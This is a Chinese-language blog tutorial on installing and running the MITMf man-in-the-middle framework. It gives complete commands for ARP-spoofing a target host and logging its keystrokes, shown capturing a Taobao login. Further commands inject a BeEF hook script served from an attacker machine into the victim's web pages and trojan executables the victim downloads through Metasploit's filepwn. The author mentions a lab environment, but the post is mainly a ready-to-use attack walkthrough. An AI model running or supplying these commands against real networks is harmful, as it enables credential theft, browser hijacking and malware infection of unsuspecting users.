MITMF安裝與使用

FLy_鵬程萬里發表於2018-06-04

MITMF其實就是一個基於python編寫的中間人攻擊的框架,就好比metaspoit一樣,無比強大且但十分易用。下面筆者就給大家介紹一下它有哪些用途,本文具有攻擊性,大家最好在自己的實驗環境中使用。

0x01. MITMF安裝

安裝依賴包以及mitmf,kali下使用如下命令:

apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file && apt-get install mitmf

安裝twisted:

pip uninstall twisted && wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2 && pip install ./Twisted-15.5.0.tar.bz2


安裝python-magic:

pip install python-magic && git clone https://github.com/secretsquirrel/the-backdoor-factory.git && cd the-backdoor-factory && ./install.sh


安裝完成,如圖:


0x02. jskeylogger模組


1.啟動MITMF的鍵盤記錄模組(注:有時MITMF不能正常執行,但是筆者訪問了http://127.0.0.1:9999之後卻能執行成功,可能是什麼BUG

echo 1 > /proc/sys/net/ipv4/ip_forward && mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.106 --jskeylogger


2.靶機登陸淘寶,檢視效果(這裡編碼出了點問題)



0x03. --js-url模組


1.啟動beef,構造hook(注:beef的賬號密碼都是beef)


2.啟動--js-url模組向目標網頁插入hook程式碼

echo 1 > /proc/sys/net/ipv4/ip_forward && mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.106 --inject --js-url http://192.168.1.105:3000/hook.js


3.啟動靶機訪問任意頁面,可以看到js 已經注入到頁面當中,玩過beef的都知道它的強大,但是筆者的beef出了點問題,就不給大家演示了,有興趣的可以自己去搜一下


0x04. --filepwn模組


1.啟動msf,載入msgrpc模組

service postgresql start && msfconsole

load msgrpc


2.改寫配置檔案

gedit /usr/share/mitmf/config/mitmf.conf


3.啟動mitmf,開啟filepwn,之後msf會自動載入幾個exp進行偵聽

echo 1 > /proc/sys/net/ipv4/ip_forward && mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.106 --filepwn


4.filepwn的原理就是在靶機下載可執行程式時將木馬插入程式裡,執行程式時就會啟動木馬,所以接下來我用靶機下載一個putty程式


5.之後正常情況下msf應該就能接收到木馬的連線,但是不知道是筆者環境出了問題還是姿勢不對,msf老是報錯,希望有經驗的讀者可以告訴我解決的辦法,謝謝


0x05. 結語


經常遇到玄學問題,可能還是由於自己比較菜,所以希望有大神看到文章之後能夠加群一起探討,一起討論玄學,哈哈。